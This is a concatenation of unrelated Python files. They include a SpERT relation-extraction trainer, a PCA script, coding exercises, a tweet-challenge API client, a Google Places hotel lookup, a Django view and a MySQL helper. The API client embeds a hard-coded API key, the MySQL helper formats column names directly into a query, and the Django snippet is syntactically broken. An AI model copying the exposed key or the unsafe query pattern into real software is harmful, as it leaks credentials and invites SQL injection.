    """Estimate the information dimension: fit I(k) = i0 + di*k to the
    information content at box refinements k in *pRange*, print the fit
    parameters and plot data plus fitted line."""
    information = [inform_dim(xv, yv, base, p) for p in pRange]
    def lin_fit(x, i0, di):
        # straight-line model; di is the information dimension
        return i0 + di * x
    para, cov = optimization.curve_fit(lin_fit, pRange, information)
    perr = np.sqrt(np.diag(cov))  # 1-sigma parameter errors
    # Report the fit
    print(f"The constant = {para[0]:.3f}")
    print(f"The information dimension = {para[1]}")
    print(f"The error = {perr}")
    # Smooth line for plotting the fit
    fitX = np.linspace(min(pRange), max(pRange), 100)
    fitY = lin_fit(fitX, para[0], para[1])
    lab = f"$I(k)$ = {para[1]:.3f}$* k$ + {para[0]:.2f}"
    fig = figure(figsize=(15,8))
    frame = fig.add_subplot(1,1,1)
    frame.scatter(pRange, information, color="navy", marker="X", s=150, zorder=3)
    frame.plot(fitX, fitY, color="darkred", label=lab, lw=2)
    frame.tick_params(axis="both", labelsize=15)
    frame.set_xlabel("k", fontsize=20)
    frame.set_ylabel("Information (bits)", fontsize=20)
    frame.legend(fontsize=20)
    frame.grid(zorder=2)
    if saveFig:
        fig.savefig(str(saveFig))
    else:
        show()
|
import argparse
import math
import os
import torch
from torch.nn import DataParallel
from torch.optim import Optimizer
import transformers
from torch.utils.data import DataLoader
from transformers import AdamW, BertConfig
from transformers import BertTokenizer
from spert import models
from spert import sampling
from spert import util
from spert.entities import Dataset
from spert.evaluator import Evaluator
from spert.input_reader import JsonInputReader, BaseInputReader
from spert.loss import SpERTLoss, Loss
from tqdm import tqdm
from spert.trainer import BaseTrainer
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
class SpERTTrainer(BaseTrainer):
    """ Joint entity and relation extraction training and evaluation.

    Drives the full SpERT lifecycle: reads JSON datasets, builds the BERT
    based model, trains with a linear-warmup schedule, and evaluates with
    the span-based Evaluator.  Metrics go to both TensorBoard and CSV via
    the BaseTrainer logging helpers.
    """
    def __init__(self, args: argparse.Namespace):
        """Set up the tokenizer and output paths from CLI arguments."""
        super().__init__(args)
        # byte-pair encoding
        self._tokenizer = BertTokenizer.from_pretrained(args.tokenizer_path,
                                                        do_lower_case=args.lowercase,
                                                        cache_dir=args.cache_path)
        # path to export predictions to
        self._predictions_path = os.path.join(self._log_path, 'predictions_%s_epoch_%s.json')
        # path to export relation extraction examples to
        self._examples_path = os.path.join(self._log_path, 'examples_%s_%s_epoch_%s.html')
    def train(self, train_path: str, valid_path: str, types_path: str, input_reader_cls: BaseInputReader):
        """Train on *train_path*, validating against *valid_path*.

        *types_path* declares the entity/relation type vocabulary and
        *input_reader_cls* parses the datasets.  Saves the final model
        (and optionally the optimizer state) under the save path.
        """
        args = self.args
        train_label, valid_label = 'train', 'valid'
        self._logger.info("Datasets: %s, %s" % (train_path, valid_path))
        self._logger.info("Model type: %s" % args.model_type)
        # create log csv files
        self._init_train_logging(train_label)
        self._init_eval_logging(valid_label)
        # read datasets
        input_reader = input_reader_cls(types_path, self._tokenizer, args.neg_entity_count,
                                        args.neg_relation_count, args.max_span_size, self._logger)
        input_reader.read({train_label: train_path, valid_label: valid_path})
        self._log_datasets(input_reader)
        train_dataset = input_reader.get_dataset(train_label)
        # schedule length: drop_last batching means partial batches are ignored
        train_sample_count = train_dataset.document_count
        updates_epoch = train_sample_count // args.train_batch_size
        updates_total = updates_epoch * args.epochs
        validation_dataset = input_reader.get_dataset(valid_label)
        self._logger.info("Updates per epoch: %s" % updates_epoch)
        self._logger.info("Updates total: %s" % updates_total)
        # create model
        model_class = models.get_model(self.args.model_type)
        # load model
        config = BertConfig.from_pretrained(self.args.model_path, cache_dir=self.args.cache_path)
        util.check_version(config, model_class, self.args.model_path)
        config.spert_version = model_class.VERSION
        model = model_class.from_pretrained(self.args.model_path,
                                            config=config,
                                            # SpERT model parameters
                                            cls_token=self._tokenizer.convert_tokens_to_ids('[CLS]'),
                                            relation_types=input_reader.relation_type_count - 1,
                                            entity_types=input_reader.entity_type_count,
                                            max_pairs=self.args.max_pairs,
                                            prop_drop=self.args.prop_drop,
                                            size_embedding=self.args.size_embedding,
                                            freeze_transformer=self.args.freeze_transformer,
                                            cache_dir=self.args.cache_path)
        # SpERT is currently optimized on a single GPU and not thoroughly tested in a multi GPU setup
        # If you still want to train SpERT on multiple GPUs, uncomment the following lines
        # # parallelize model
        # if self._device.type != 'cpu':
        #     model = torch.nn.DataParallel(model)
        model.to(self._device)
        # create optimizer
        optimizer_params = self._get_optimizer_params(model)
        optimizer = AdamW(optimizer_params, lr=args.lr, weight_decay=args.weight_decay, correct_bias=False)
        # create scheduler: linear warmup then linear decay over all updates
        scheduler = transformers.get_linear_schedule_with_warmup(optimizer,
                                                                 num_warmup_steps=args.lr_warmup * updates_total,
                                                                 num_training_steps=updates_total)
        # create loss function
        rel_criterion = torch.nn.BCEWithLogitsLoss(reduction='none')
        entity_criterion = torch.nn.CrossEntropyLoss(reduction='none')
        compute_loss = SpERTLoss(rel_criterion, entity_criterion, model, optimizer, scheduler, args.max_grad_norm)
        # eval validation set
        if args.init_eval:
            self._eval(model, validation_dataset, input_reader, 0, updates_epoch)
        # train
        for epoch in range(args.epochs):
            # train epoch
            self._train_epoch(model, compute_loss, optimizer, train_dataset, updates_epoch, epoch)
            # eval validation sets
            if not args.final_eval or (epoch == args.epochs - 1):
                self._eval(model, validation_dataset, input_reader, epoch + 1, updates_epoch)
        # save final model
        extra = dict(epoch=args.epochs, updates_epoch=updates_epoch, epoch_iteration=0)
        global_iteration = args.epochs * updates_epoch
        self._save_model(self._save_path, model, self._tokenizer, global_iteration,
                         optimizer=optimizer if self.args.save_optimizer else None, extra=extra,
                         include_iteration=False, name='final_model')
        self._logger.info("Logged in: %s" % self._log_path)
        self._logger.info("Saved in: %s" % self._save_path)
        self._close_summary_writer()
    def eval(self, dataset_path: str, types_path: str, input_reader_cls: BaseInputReader):
        """Evaluate a saved model on the dataset at *dataset_path*."""
        args = self.args
        dataset_label = 'test'
        self._logger.info("Dataset: %s" % dataset_path)
        self._logger.info("Model: %s" % args.model_type)
        # create log csv files
        self._init_eval_logging(dataset_label)
        # read datasets
        input_reader = input_reader_cls(types_path, self._tokenizer,
                                        max_span_size=args.max_span_size, logger=self._logger)
        input_reader.read({dataset_label: dataset_path})
        self._log_datasets(input_reader)
        # create model
        model_class = models.get_model(self.args.model_type)
        config = BertConfig.from_pretrained(self.args.model_path, cache_dir=self.args.cache_path)
        util.check_version(config, model_class, self.args.model_path)
        model = model_class.from_pretrained(self.args.model_path,
                                            config=config,
                                            # SpERT model parameters
                                            cls_token=self._tokenizer.convert_tokens_to_ids('[CLS]'),
                                            relation_types=input_reader.relation_type_count - 1,
                                            entity_types=input_reader.entity_type_count,
                                            max_pairs=self.args.max_pairs,
                                            prop_drop=self.args.prop_drop,
                                            size_embedding=self.args.size_embedding,
                                            freeze_transformer=self.args.freeze_transformer,
                                            cache_dir=self.args.cache_path)
        model.to(self._device)
        # evaluate
        self._eval(model, input_reader.get_dataset(dataset_label), input_reader)
        self._logger.info("Logged in: %s" % self._log_path)
        self._close_summary_writer()
    def _train_epoch(self, model: torch.nn.Module, compute_loss: Loss, optimizer: Optimizer, dataset: Dataset,
                     updates_epoch: int, epoch: int):
        """Run one training epoch over *dataset*; returns the number of
        iterations performed."""
        self._logger.info("Train epoch: %s" % epoch)
        # create data loader
        dataset.switch_mode(Dataset.TRAIN_MODE)
        data_loader = DataLoader(dataset, batch_size=self.args.train_batch_size, shuffle=True, drop_last=True,
                                 num_workers=self.args.sampling_processes, collate_fn=sampling.collate_fn_padding)
        model.zero_grad()
        iteration = 0
        total = dataset.document_count // self.args.train_batch_size
        for batch in tqdm(data_loader, total=total, desc='Train epoch %s' % epoch):
            model.train()
            batch = util.to_device(batch, self._device)
            # forward step
            entity_logits, rel_logits = model(encodings=batch['encodings'], context_masks=batch['context_masks'],
                                              entity_masks=batch['entity_masks'], entity_sizes=batch['entity_sizes'],
                                              relations=batch['rels'], rel_masks=batch['rel_masks'])
            # compute loss and optimize parameters (compute_loss also steps
            # optimizer and scheduler)
            batch_loss = compute_loss.compute(entity_logits=entity_logits, rel_logits=rel_logits,
                                              rel_types=batch['rel_types'], entity_types=batch['entity_types'],
                                              entity_sample_masks=batch['entity_sample_masks'],
                                              rel_sample_masks=batch['rel_sample_masks'])
            # logging
            iteration += 1
            global_iteration = epoch * updates_epoch + iteration
            if global_iteration % self.args.train_log_iter == 0:
                self._log_train(optimizer, batch_loss, epoch, iteration, global_iteration, dataset.label)
        return iteration
    def _eval(self, model: torch.nn.Module, dataset: Dataset, input_reader: JsonInputReader,
              epoch: int = 0, updates_epoch: int = 0, iteration: int = 0):
        """Evaluate *model* on *dataset*, log NER / relation / relation+NER
        scores, and optionally store predictions and HTML examples."""
        self._logger.info("Evaluate: %s" % dataset.label)
        if isinstance(model, DataParallel):
            # currently no multi GPU support during evaluation
            model = model.module
        # create evaluator
        evaluator = Evaluator(dataset, input_reader, self._tokenizer,
                              self.args.rel_filter_threshold, self.args.no_overlapping, self._predictions_path,
                              self._examples_path, self.args.example_count, epoch, dataset.label)
        # create data loader
        dataset.switch_mode(Dataset.EVAL_MODE)
        data_loader = DataLoader(dataset, batch_size=self.args.eval_batch_size, shuffle=False, drop_last=False,
                                 num_workers=self.args.sampling_processes, collate_fn=sampling.collate_fn_padding)
        with torch.no_grad():
            model.eval()
            # iterate batches
            total = math.ceil(dataset.document_count / self.args.eval_batch_size)
            for batch in tqdm(data_loader, total=total, desc='Evaluate epoch %s' % epoch):
                # move batch to selected device
                batch = util.to_device(batch, self._device)
                # run model (forward pass)
                result = model(encodings=batch['encodings'], context_masks=batch['context_masks'],
                               entity_masks=batch['entity_masks'], entity_sizes=batch['entity_sizes'],
                               entity_spans=batch['entity_spans'], entity_sample_masks=batch['entity_sample_masks'],
                               evaluate=True)
                entity_clf, rel_clf, rels = result
                # evaluate batch
                evaluator.eval_batch(entity_clf, rel_clf, rels, batch)
        global_iteration = epoch * updates_epoch + iteration
        ner_eval, rel_eval, rel_nec_eval = evaluator.compute_scores()
        self._log_eval(*ner_eval, *rel_eval, *rel_nec_eval,
                       epoch, iteration, global_iteration, dataset.label)
        if self.args.store_predictions and not self.args.no_overlapping:
            evaluator.store_predictions()
        if self.args.store_examples:
            evaluator.store_examples()
    def _get_optimizer_params(self, model):
        """Parameter groups for AdamW: no weight decay on biases/LayerNorm."""
        param_optimizer = list(model.named_parameters())
        no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
        optimizer_params = [
            {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
             'weight_decay': self.args.weight_decay},
            {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}]
        return optimizer_params
    def _log_train(self, optimizer: Optimizer, loss: float, epoch: int,
                   iteration: int, global_iteration: int, label: str):
        """Log one training step (loss, per-sample loss, lr) to TB and CSV."""
        # average loss
        avg_loss = loss / self.args.train_batch_size
        # get current learning rate
        lr = self._get_lr(optimizer)[0]
        # log to tensorboard
        self._log_tensorboard(label, 'loss', loss, global_iteration)
        self._log_tensorboard(label, 'loss_avg', avg_loss, global_iteration)
        self._log_tensorboard(label, 'lr', lr, global_iteration)
        # log to csv
        self._log_csv(label, 'loss', loss, epoch, iteration, global_iteration)
        self._log_csv(label, 'loss_avg', avg_loss, epoch, iteration, global_iteration)
        self._log_csv(label, 'lr', lr, epoch, iteration, global_iteration)
    def _log_eval(self, ner_prec_micro: float, ner_rec_micro: float, ner_f1_micro: float,
                  ner_prec_macro: float, ner_rec_macro: float, ner_f1_macro: float,
                  rel_prec_micro: float, rel_rec_micro: float, rel_f1_micro: float,
                  rel_prec_macro: float, rel_rec_macro: float, rel_f1_macro: float,
                  rel_nec_prec_micro: float, rel_nec_rec_micro: float, rel_nec_f1_micro: float,
                  rel_nec_prec_macro: float, rel_nec_rec_macro: float, rel_nec_f1_macro: float,
                  epoch: int, iteration: int, global_iteration: int, label: str):
        """Log the full micro/macro P/R/F1 metric set to TB and one CSV row."""
        # log to tensorboard
        self._log_tensorboard(label, 'eval/ner_prec_micro', ner_prec_micro, global_iteration)
        self._log_tensorboard(label, 'eval/ner_recall_micro', ner_rec_micro, global_iteration)
        self._log_tensorboard(label, 'eval/ner_f1_micro', ner_f1_micro, global_iteration)
        self._log_tensorboard(label, 'eval/ner_prec_macro', ner_prec_macro, global_iteration)
        self._log_tensorboard(label, 'eval/ner_recall_macro', ner_rec_macro, global_iteration)
        self._log_tensorboard(label, 'eval/ner_f1_macro', ner_f1_macro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_prec_micro', rel_prec_micro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_recall_micro', rel_rec_micro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_f1_micro', rel_f1_micro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_prec_macro', rel_prec_macro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_recall_macro', rel_rec_macro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_f1_macro', rel_f1_macro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_nec_prec_micro', rel_nec_prec_micro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_nec_recall_micro', rel_nec_rec_micro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_nec_f1_micro', rel_nec_f1_micro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_nec_prec_macro', rel_nec_prec_macro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_nec_recall_macro', rel_nec_rec_macro, global_iteration)
        self._log_tensorboard(label, 'eval/rel_nec_f1_macro', rel_nec_f1_macro, global_iteration)
        # log to csv
        self._log_csv(label, 'eval', ner_prec_micro, ner_rec_micro, ner_f1_micro,
                      ner_prec_macro, ner_rec_macro, ner_f1_macro,
                      rel_prec_micro, rel_rec_micro, rel_f1_micro,
                      rel_prec_macro, rel_rec_macro, rel_f1_macro,
                      rel_nec_prec_micro, rel_nec_rec_micro, rel_nec_f1_micro,
                      rel_nec_prec_macro, rel_nec_rec_macro, rel_nec_f1_macro,
                      epoch, iteration, global_iteration)
    def _log_datasets(self, input_reader):
        """Log the type vocabulary and per-dataset statistics."""
        self._logger.info("Relation type count: %s" % input_reader.relation_type_count)
        self._logger.info("Entity type count: %s" % input_reader.entity_type_count)
        self._logger.info("Entities:")
        for e in input_reader.entity_types.values():
            self._logger.info(e.verbose_name + '=' + str(e.index))
        self._logger.info("Relations:")
        for r in input_reader.relation_types.values():
            self._logger.info(r.verbose_name + '=' + str(r.index))
        for k, d in input_reader.datasets.items():
            self._logger.info('Dataset: %s' % k)
            self._logger.info("Document count: %s" % d.document_count)
            self._logger.info("Relation count: %s" % d.relation_count)
            self._logger.info("Entity count: %s" % d.entity_count)
        self._logger.info("Context size: %s" % input_reader.context_size)
    def _init_train_logging(self, label):
        """Declare the CSV columns for training metrics under *label*."""
        self._add_dataset_logging(label,
                                  data={'lr': ['lr', 'epoch', 'iteration', 'global_iteration'],
                                        'loss': ['loss', 'epoch', 'iteration', 'global_iteration'],
                                        'loss_avg': ['loss_avg', 'epoch', 'iteration', 'global_iteration']})
    def _init_eval_logging(self, label):
        """Declare the CSV columns for evaluation metrics under *label*."""
        self._add_dataset_logging(label,
                                  data={'eval': ['ner_prec_micro', 'ner_rec_micro', 'ner_f1_micro',
                                                 'ner_prec_macro', 'ner_rec_macro', 'ner_f1_macro',
                                                 'rel_prec_micro', 'rel_rec_micro', 'rel_f1_micro',
                                                 'rel_prec_macro', 'rel_rec_macro', 'rel_f1_macro',
                                                 'rel_nec_prec_micro', 'rel_nec_rec_micro', 'rel_nec_f1_micro',
                                                 'rel_nec_prec_macro', 'rel_nec_rec_macro', 'rel_nec_f1_macro',
                                                 'epoch', 'iteration', 'global_iteration']})
|
from sklearn.datasets import *
import numpy as np
import pandas as pd
import math
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler, LabelEncoder
wine = load_wine()
cancer = load_breast_cancer()  # NOTE(review): loaded but never used below
# NOTE(review): unused, and load_boston was removed in scikit-learn >= 1.2;
# consider deleting this line.
boston = load_boston()
df = pd.DataFrame(wine.data, columns=wine.feature_names)
df["target"] = pd.Series(wine.target)
feature_columns = df.columns[df.columns != "target"]
df = df[feature_columns]
# prep pca with a standard scaler to centre the data around the origin
ss = StandardScaler()
scaled_data = ss.fit_transform(df)
# fit transform PCA object
pca = PCA(n_components=min(df.shape[0], df.shape[1]))
pca.fit(scaled_data)
pca_data = pca.transform(scaled_data)
pct_variation = np.round(pca.explained_variance_ratio_ * 100, decimals=1)
labels = ["PC{}".format(x) for x in range(1, len(pct_variation) + 1)]
# run scree plot to see how many principal components should go into the final plot
# select the PCs that describe the most amount of variation in the data
fig, ax = plt.subplots()
ax.bar(x=range(1, len(pct_variation) + 1), height=pct_variation, tick_label=labels)
ax.set(xlabel="Principal Components", ylabel="% Variation", title="Scree Plot of PCA")
plt.show()
# from the PCA plot, we can use the information we learned from the scree plot
# first we put the new coordinates, created by the pca.transform(scaled_data) operation, into a nice matrix
# where the rows have sample labels and the solumns have the PCA labels
pca_df = pd.DataFrame(pca_data, columns=labels)
print(pca_df.head())
# plot using the PCA dataframe
# BUG FIX: the original plotted PC1 against itself (scatter(PC1, PC1)) and
# labelled the y-axis "PC1" while using pct_variation[1]; the y-axis is PC2.
plt.scatter(pca_df.PC1, pca_df.PC2)
plt.title("My PCA Graph")
plt.xlabel("PC1 - {}%".format(pct_variation[0]))
plt.ylabel("PC2 - {}%".format(pct_variation[1]))
# this loop allows us to annotate (put) the sample names to the graph
for sample in pca_df.index:
    plt.annotate(sample, (pca_df["PC1"].loc[sample], pca_df["PC2"].loc[sample]))
plt.show()
# Now let's take a look at the loading scores for PC1 to see which features have the largest influence on separating the clusters along the X-axis
# principal components are 0-indexed, so PC1 is at index 0.
loading_scores = pd.Series(pca.components_[0], index=feature_columns)
# sort the loading scores based on their magnitude of influence (absolute value, as some of the loading scores can have a negative value)
sorted_loading_scores = loading_scores.abs().sort_values(ascending=False)
# get top features as a mask criteria for our dataframe
top_features = sorted_loading_scores[:4].index.values
print(sorted_loading_scores)
print(sorted_loading_scores[top_features])
a = np.round(pca.explained_variance_ratio_ *100, decimals=2)
b = pca.components_
print("Eigenvalues for PC1\n{}\n".format(b[0]))
|
def comp(array1, array2):
    """Return True iff array2 is a permutation of the squares of array1."""
    if None in (array1, array2):
        return False
    squared = sorted(value ** 2 for value in array1)
    return squared == sorted(array2)
|
import wsdm.ts.helpers.persons.persons as p_lib
import definitions
import sys
import re
import numpy as np
import os
def find_similarity(person_name, term, inputType):
    """Score how strongly *term* is associated with *person_name*.

    Reads the person's text file (if any), extracts nationality or
    profession majority scores depending on inputType, and returns the
    score for *term* (0 when absent or when the file does not exist).
    Raises TypeError for an unknown inputType.
    """
    scores = {}
    path = os.path.join(definitions.PERSONS_DIR,
                        p_lib.remove_spaces(person_name) + ".txt")
    if os.path.isfile(path):
        with open(path, 'r', encoding='utf8') as handle:
            if inputType == definitions.TYPE_NATIONALITY:
                scores = get_person_nationalities(handle)
            elif inputType == definitions.TYPE_PROFESSION:
                scores = get_person_professions(handle)
            else:
                raise TypeError
    return scores.get(term, 0)
def remove_quoted_words(text):
    """Lower-case *text* and strip every double-quoted span from it."""
    lowered = text.lower()
    for quoted in re.findall(r"\".*?\"", lowered):
        lowered = lowered.replace(quoted, '')
    return lowered
def get_person_professions(file):
    """Rank professions mentioned in *file* by earliest occurrence.

    Earlier-mentioned professions get higher majority scores, from 7 down
    to 1 (at most seven entries are returned).
    """
    result = {}
    majority = 7
    content = remove_quoted_words(file.read().lower())
    indexes = {}
    nomenclature = os.path.join(definitions.NOMENCLATURES_DIR, "professions.txt")
    with open(nomenclature, encoding='utf8', mode='r') as fr:
        for line in fr:
            profession = line.rstrip()
            lowered = profession.lower()
            words = lowered.split(' ')
            if lowered in content:
                indexes[profession] = content.index(lowered)
            elif len(words) > 1 and all(w in content for w in words):
                # Multi-word profession whose words appear only separately:
                # rank it at the mean position of the individual words.
                indexes[profession] = np.mean([content.index(w) for w in words])
    for profession in sorted(indexes, key=indexes.get):
        result[profession] = majority
        if majority > 0:
            majority -= 1
        if majority <= 0:
            break
    return result
def get_person_nationalities(file):
    """Rank nationalities mentioned in *file*, earliest lines first.

    Person names in each line are first mapped to their nationality via the
    nationalities dictionary.  Scores run from 7 down; once the budget is
    exhausted, later finds are recorded with score 0 (matching the original
    decrement/break behaviour).
    """
    from wsdm.ts.helpers.nationalities import nationalities
    result = {}
    nationality_majority = 7
    # PERF FIX: the nomenclature file was previously re-opened and re-read
    # for every input line; read it once up front.
    with open(os.path.join(definitions.NOMENCLATURES_DIR, "nationalities.txt"),
              encoding='utf8', mode='r') as fr:
        known_nationalities = [line.rstrip() for line in fr]
    for line in file:
        for person, nationality in nationalities.nationalities_dict.items():
            line = line.replace(person, nationality)
        nationality_indexes = {}
        for nationality in known_nationalities:
            if nationality not in result and nationality in line:
                nationality_indexes[nationality] = line.index(nationality)
        if len(nationality_indexes) > 0:
            for nationality in sorted(nationality_indexes, key=nationality_indexes.get):
                result[nationality] = nationality_majority
                if nationality_majority > 0:
                    nationality_majority -= 1
                if nationality_majority <= 0:
                    break
    return result
def main(argv):
    """Demo entry point: print the nationality score for a sample person."""
    score = find_similarity('Richard Séguin', 'Germany', definitions.TYPE_NATIONALITY)
    print(score)


if __name__ == '__main__':
    main(sys.argv[:])
"""Collection of DTOs and class for interacting with the service"""
import gzip
import http.client
import json
# Challenge service endpoint and the API key sent with every request.
# NOTE(review): hard-coded credential -- move to config/env before sharing.
SERVER_URL = "devrecruitmentchallenge.com"
API_KEY = "59b505aa-1e62-4f4e-8b0b-16977331e485"
class ChallengeInfo(object):
    """Information regarding a challenge."""

    def __init__(self, cid, challenge_type, name, description):
        self.cid = cid
        self.name = name
        self.description = description
        # Normalised to lower case so type comparisons are case-insensitive.
        self.challenge_type = challenge_type.lower()
class Tweet(object):
    """A single tweet to be analysed."""

    def __init__(self, tid, time, source, tweet):
        self.tid, self.time = tid, time
        self.source, self.tweet = source, tweet
class Challenge(object):
    """A challenge definition: metadata plus the tweets to analyse."""

    def __init__(self, info, tweets):
        self.info, self.tweets = info, tweets
class ChallengeResult(object):
    """Response from a challenge submission."""

    def __init__(self, submission_id, mark):
        self.submission_id, self.mark = submission_id, mark
class Product(object):
    """A product definition."""

    def __init__(self, name, product_type):
        self.name, self.product_type = name, product_type
class Company(object):
    """A company definition; raw product dicts are wrapped in Product DTOs."""

    def __init__(self, name, ticker, products, industry):
        self.name = name
        self.ticker = ticker
        self.industry = industry
        # Each raw API dict becomes a typed Product.
        self.products = [Product(item["name"], item["productType"]) for item in products]
def get_challenge_list():
    """Fetch every available challenge as a list of ChallengeInfo DTOs."""
    data = get_json("/api/challenges/")
    return [ChallengeInfo(c["id"], c["challengeType"], c["name"], c["description"])
            for c in data["challenges"]]
def get_challenge(cid):
    """Get the details of a specific challenge.

    Returns a Challenge wrapping the challenge metadata and its tweets.
    """
    data = get_json("/api/challenges/{}".format(cid))
    info_json = data["challenge"]
    # BUG FIX: the name was previously passed as the literal list ["name"]
    # instead of the value from the response.
    info = ChallengeInfo(info_json["id"], info_json["challengeType"],
                         info_json["name"], info_json["description"])
    tweets = [Tweet(k["id"], k["time"], k["source"], k["tweet"]) for k in data["tweets"]]
    return Challenge(info, tweets)
def get_company_info():
    """Get details on all companies as Company DTOs."""
    data = get_json("/api/world/companies")
    return [Company(c["name"], c["ticker"], c["products"], c["industry"])
            for c in data["companies"]]
def get_positive_words():
    """Get a list of positive words from the service."""
    data = get_json("/api/words/positive")
    # list() instead of a copying comprehension (same result, clearer idiom).
    return list(data["words"])
def get_neutral_words():
    """Get a list of neutral words from the service."""
    data = get_json("/api/words/neutral")
    # list() instead of a copying comprehension (same result, clearer idiom).
    return list(data["words"])
def get_negative_words():
    """Get a list of negative words from the service."""
    data = get_json("/api/words/negative")
    # list() instead of a copying comprehension (same result, clearer idiom).
    return list(data["words"])
def post_pertweet_submission(submission):
    """Post a per-tweet challenge submission and return the marked result."""
    payload = json.dumps(submission)
    response = post_json("/api/submissions/pertweet", payload)
    return ChallengeResult(response["submissionId"], response["mark"])
def post_aggregated_submission(submission):
    """Post an aggregated challenge submission and return the marked result."""
    payload = json.dumps(submission)
    response = post_json("/api/submissions/aggregated", payload)
    return ChallengeResult(response["submissionId"], response["mark"])
def get_json(url):
    """GET *url* from the challenge server and return the decoded JSON body.

    Transparently inflates gzip-encoded responses; raises ValueError on any
    non-200 status.
    """
    connection = http.client.HTTPConnection(SERVER_URL)
    request_headers = {
        "Authorization": "ApiKey {}".format(API_KEY),
        "Accept-encoding": "gzip",
    }
    connection.request("GET", url, headers=request_headers)
    response = connection.getresponse()
    raw_content = response.read()
    # Server may honour the gzip Accept-encoding header; inflate if it did.
    if response.getheader("Content-encoding") == "gzip":
        content = gzip.decompress(raw_content).decode()
    else:
        content = raw_content.decode()
    print("GET {} {} ({} bytes)".format(response.status, url, len(raw_content)))
    if response.status != 200:
        print(content)
        raise ValueError("GET of {} was not successful".format(url))
    return json.loads(content)
def post_json(url, j):
    """POST JSON string *j* to *url* and return the decoded JSON response.

    Raises ValueError (echoing the sent payload) on any non-200 status.
    """
    connection = http.client.HTTPConnection(SERVER_URL)
    request_headers = {"Authorization": "ApiKey {}".format(API_KEY), "Content-type": "application/json"}
    connection.request("POST", url, j, headers=request_headers)
    response = connection.getresponse()
    content = response.read().decode()
    print("POST {} {} ({} bytes)".format(response.status, url, len(content)))
    if response.status != 200:
        print(content)
        raise ValueError("POST to {} was not successful. Sent JSON '{}'".format(url, j))
    return json.loads(content)
|
import googlemaps
import logging
import json
from time import sleep
class LookupHotelInviumPlaces(object):
    """Thin wrapper over the Google Places API for hotel lookups."""

    def __init__(self, **kwargs):
        self.logger = logging.getLogger('HotelRefugus')
        self.client = None

    def initialise_places(self, api_key):
        """
        Initialise API Session with api key
        :param api_key: str
        """
        self.client = googlemaps.Client(key=api_key)

    def lookup_hotels(self, address, area, language='en'):
        """
        Query Google Places API to obtain list of hotels within area
        of requested address in requested language (default english)
        :param address: str
        :param area: str
        :param language: str
        :return (dict): results array from API https://developers.google.com/places/web-service/search#nearby-search-and-text-search-responses
        """
        self.logger.info('Looking up Hotels')
        self.logger.debug(f'Address: {address}\nArea: {area}\nLanguage: {language}')
        coordinates = self.get_gps_coordinates(address)
        self.logger.debug(coordinates)
        response = self.client.places_nearby(location=coordinates, keyword='hotel',
                                             type='lodging', radius=area)
        if response.get('next_page_token') is None:
            # Single page of results: return it directly.
            self.logger.debug(json.dumps(response['results']))
            return response['results']
        # More than 20 results: follow the pagination tokens.
        self.logger.debug('More than 20 results found, paging Dr. Token')
        results = response['results']
        page_token = response['next_page_token']
        while page_token is not None:
            try:
                response = self.client.places_nearby(page_token=page_token)
            except googlemaps.exceptions.ApiError as err:
                # Requesting a page before it is available raises; wait, then
                # retry once.
                self.logger.debug(err)
                self.logger.warning('Token is not ready, waiting 2 seconds')
                sleep(2)
                response = self.client.places_nearby(page_token=page_token)
            results += response['results']
            page_token = response.get('next_page_token')
        return results

    def get_gps_coordinates(self, address):
        """
        Convert Postal address into GPS Coordinates
        :param address: str
        :return: str latitude, longitude
        """
        location = self.client.geocode(address)[0]['geometry']['location']
        return '{0},{1}'.format(location['lat'], location['lng'])
|
# -*- coding: utf-8 -*-
import string
class Solution:
    def titleToNumber(self, s):
        """Convert an Excel-style column title (e.g. 'AB') to its 1-based number.

        Raises ValueError if *s* contains a non-uppercase-ASCII character.
        """
        total = 0
        for letter in s:
            # Base-26 accumulation: 'A' contributes 1, 'Z' contributes 26.
            total = total * 26 + string.ascii_uppercase.index(letter) + 1
        return total
if __name__ == "__main__":
    solution = Solution()
    # Sanity checks covering single- and double-letter titles.
    assert solution.titleToNumber("A") == 1
    assert solution.titleToNumber("AB") == 28
    assert solution.titleToNumber("ZY") == 701
|
# Read a number and print its square root.
value = float(input('Enter a number: '))
root = value ** 0.5
print(root)
|
from django.shortcuts import render, redirect, reverse
# Create your views here.
def index(request, schmoo):
print id
return render(request, 'app2/index.html')
def post_test(request):
    """Handle a test POST by redirecting to app1's index view."""
    print "here"  # debug trace -- presumably left over from development
    return redirect(reverse('app1:index'))
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import absolute_import, division, print_function, unicode_literals
import pymysql.cursors
class MySQLUtil:
    """Small helper around pymysql for connection checks and simple queries."""

    def __init__(self, host="", port=0, user="", password=""):
        """Store connection parameters; all four must be truthy."""
        if not (host and port and user and password):
            raise ValueError("Wrong input parameters")
        self.db_host = host
        self.db_port = int(port)
        self.db_user = user
        self.db_password = password

    def create_connection(self):
        """Open and return a new pymysql connection using dict cursors."""
        return pymysql.connect(
            host=self.db_host,
            port=self.db_port,
            user=self.db_user,
            password=self.db_password,
            cursorclass=pymysql.cursors.DictCursor,
        )

    def try_connect(self):
        """Open and immediately close a connection to validate credentials."""
        self.create_connection().close()

    def get_mysql_version(self):
        """Return the server version string reported by SELECT version()."""
        connection = self.create_connection()
        with connection:
            cursor = connection.cursor()
            cursor.execute("SELECT version()")
            row = cursor.fetchone()
        return row["version()"]

    def user_has_privileges(self, user, privileges):
        """Fetch the requested privilege columns for *user* from mysql.user."""
        connection = self.create_connection()
        with connection:
            cursor = connection.cursor()
            query = "SELECT {} FROM mysql.user WHERE user=%s".format(",".join(privileges))
            cursor.execute(query, (user,))
            row = cursor.fetchone()
        return row
|
import cv2
import numpy as np
def calHuMoments(src, logHuMoments, num):
